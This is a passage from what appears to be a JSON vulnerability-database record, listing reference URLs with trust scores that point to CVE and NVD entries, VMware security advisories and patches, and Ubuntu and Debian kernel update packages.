        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1386"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3286"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0001"
      },
      {
        "trust": 0.1,
        "url": "http://bit.ly/aqtcqn"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2908"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1013127"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1377"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2409"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3620"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3228"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4021"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1387"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0427"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0426"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3621"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-6304"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3939"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4020"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3736"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1378"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3621"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0097"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4537"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0290"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3286"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3612"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3613"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4138"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4272"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0382"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4355"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4141"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2908"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3613"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0590"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4538"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3620"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3726"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-6304"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2910"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3612"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1379"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4537"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3889"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2910"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3563"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3228"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1787"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1035110"
      },
      {
        "trust": 0.1,
        "url": "http://download3.vmware.com/software/vi/esxe350-201105401-o-sg.zip"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/d/info/desktop_downloads/vmware_player/3_0"
      },
      {
        "trust": 0.1,
        "url": "https://hostupdate.vmware.com/software/vum/offline/release-277-20110424-816604/esx400-201104001.zip"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-1188"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/d/info/desktop_downloads/vmware_fusion_for_the_mac/3_0"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security/advisories"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2217"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/fusion3/doc/releasenotes_fusion_313.html"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1036402"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2145"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1036754"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2240"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1035111"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-2240"
      },
      {
        "trust": 0.1,
        "url": "https://hostupdate.vmware.com/software/vum/offline/release-275-20110420-062017/esx410-201104001.zip"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2217"
      },
      {
        "trust": 0.1,
        "url": "http://download3.vmware.com/software/vi/esx350-201105404-sg.zip"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2145"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2146"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1036403"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/d/info/desktop_downloads/vmware_workstation/7_0"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1037260"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1036399"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1188"
      },
      {
        "trust": 0.1,
        "url": "http://gpgtools.org"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1037261"
      },
      {
        "trust": 0.1,
        "url": "https://hostupdate.vmware.com/software/vum/offline/release-278-20110424-080274/esxi400-201104001.zip"
      },
      {
        "trust": 0.1,
        "url": "http://enigmail.mozdev.org/"
      },
      {
        "trust": 0.1,
        "url": "http://download3.vmware.com/software/vi/esx350-201105406-sg.zip"
      },
      {
        "trust": 0.1,
        "url": "https://hostupdate.vmware.com/software/vum/offline/release-276-20110420-682352/esxi410-201104001.zip"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2146"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1787"
      },
      {
        "trust": 0.1,
        "url": "http://download3.vmware.com/software/vi/esx350-201105401-sg.zip"
      },
      {
        "trust": 0.1,
        "url": "https://www.vmware.com/support/player31/doc/releasenotes_player314.html"
      },
      {
        "trust": 0.1,
        "url": "http://downloads.vmware.com/support/ws71/doc/releasenotes_ws714.html"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0309"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-i386_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
